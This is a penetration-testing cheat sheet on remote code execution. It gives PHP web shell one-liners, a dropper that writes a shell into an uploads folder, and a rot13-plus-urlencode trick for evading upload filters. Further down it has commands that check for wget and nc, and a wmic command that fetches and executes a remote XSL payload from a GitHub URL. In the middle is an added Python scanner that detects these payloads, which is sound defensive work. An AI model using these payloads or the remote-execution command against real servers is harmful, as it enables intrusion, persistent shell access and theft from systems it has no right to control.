[ Pen Testing ] :: Step by Step: Remote Code Execution (RCE)

PHP RCE

  • Test a form for vulnerability to PHP RCE:
<?php phpinfo(); ?>
  • Get a remote PHP shell:
<?php system($_GET["c"]); ?>
<?php `$_GET["c"]`; ?>
  • Upload a file:
<?php file_put_contents('/var/www/html/uploads/test.php', '<?php system($_GET["c"]);?>'); ?>
  • Evade file-type upload filters using rot13 + urlencode:
<?php
$payload="%3C%3Fcuc%20flfgrz%28%24_TRG%5Bp%5D%29%3B%3F%3E";
file_put_contents('/var/www/html/uploads/testfile.php',
str_rot13(urldecode($payload))); ?>
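
On the defensive side, an extension allowlist alone does not stop the upload above: the dropped file is plain PHP, and the dropper hides it behind urlencode + rot13. The scanner below is an added example (not from this page or any project it references) that inspects uploaded content instead of the file name, trying each decoding the trick could use; the regexes are illustrative indicators built from the payloads listed above, and the sample files are constructed.

```python
import codecs
import re
from urllib.parse import unquote

# Illustrative indicators built from the payloads listed above; not a vendor signature set.
PHP_OPEN = re.compile(r"<\?(php|=)?", re.IGNORECASE)
EXEC_SINK = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\("  # call-style execution
    r"|`[^`\n]*\$_(GET|POST|REQUEST)[^`\n]*`",                   # backtick shell operator
    re.IGNORECASE)
USER_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[", re.IGNORECASE)
RECON = re.compile(r"\bphpinfo\s*\(", re.IGNORECASE)
DROPPER = re.compile(r"\bfile_put_contents\s*\(.*\b(str_rot13|urldecode)\s*\(",
                     re.IGNORECASE | re.DOTALL)

def decode_variants(text: str) -> dict:
    """Decodings that undo the rot13 + urlencode trick, in every order it could be applied."""
    decoded = unquote(text)
    return {
        "raw": text,
        "urldecode": decoded,
        "rot13": codecs.decode(text, "rot_13"),
        "urldecode+rot13": codecs.decode(decoded, "rot_13"),
    }

def classify(text: str) -> tuple:
    """Return (verdict, variant) where verdict is 'dropper', 'webshell', 'recon' or 'clean'."""
    if DROPPER.search(text):  # a writer that decodes its payload before dropping it
        return ("dropper", "raw")
    variants = decode_variants(text)
    for name, body in variants.items():
        if PHP_OPEN.search(body) and EXEC_SINK.search(body) and USER_INPUT.search(body):
            return ("webshell", name)
    for name, body in variants.items():
        if PHP_OPEN.search(body) and RECON.search(body):
            return ("recon", name)
    return ("clean", None)

# Constructed samples mirroring the page's payloads plus one harmless file.
SAMPLES = {
    "probe": '<?php phpinfo(); ?>',
    "shell": '<?php system($_GET["c"]); ?>',
    "backtick": '<?php `$_GET["c"]`; ?>',
    "obfuscated": '%3C%3Fcuc%20flfgrz%28%24_TRG%5Bp%5D%29%3B%3F%3E',
    "dropper": '<?php $p="%3C%3Fcuc%20flfgrz%28%24_TRG%5Bp%5D%29%3B%3F%3E"; '
               'file_put_contents("/tmp/x.php", str_rot13(urldecode($p))); ?>',
    "benign": 'Hello, world. No code here.',
}

if __name__ == "__main__":
    for label, content in SAMPLES.items():
        print(f"{label:11s} -> {classify(content)}")
```

The obfuscated sample is only caught on the urldecode+rot13 pass, which is the point: a content filter has to normalise before matching, and the dropper is flagged by its decode-then-write shape rather than by any visible `<?php system(` string.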

RCE via webshell

  • See if the target machine has handy utilities:
which wget
which nc

RCE via WMIC

Running PowerShell code on a target without PowerShell installed (wmic fetches and executes a remote XSL file):

  • Generate the payload with web_delivery
  • Encode the payload
  • Include the payload in an XSL file
  • Execute it through wmic:
wmic process get brief /format:"https://raw.githubusercontent.com/adon90/pentest_compilation/master/nops.xsl"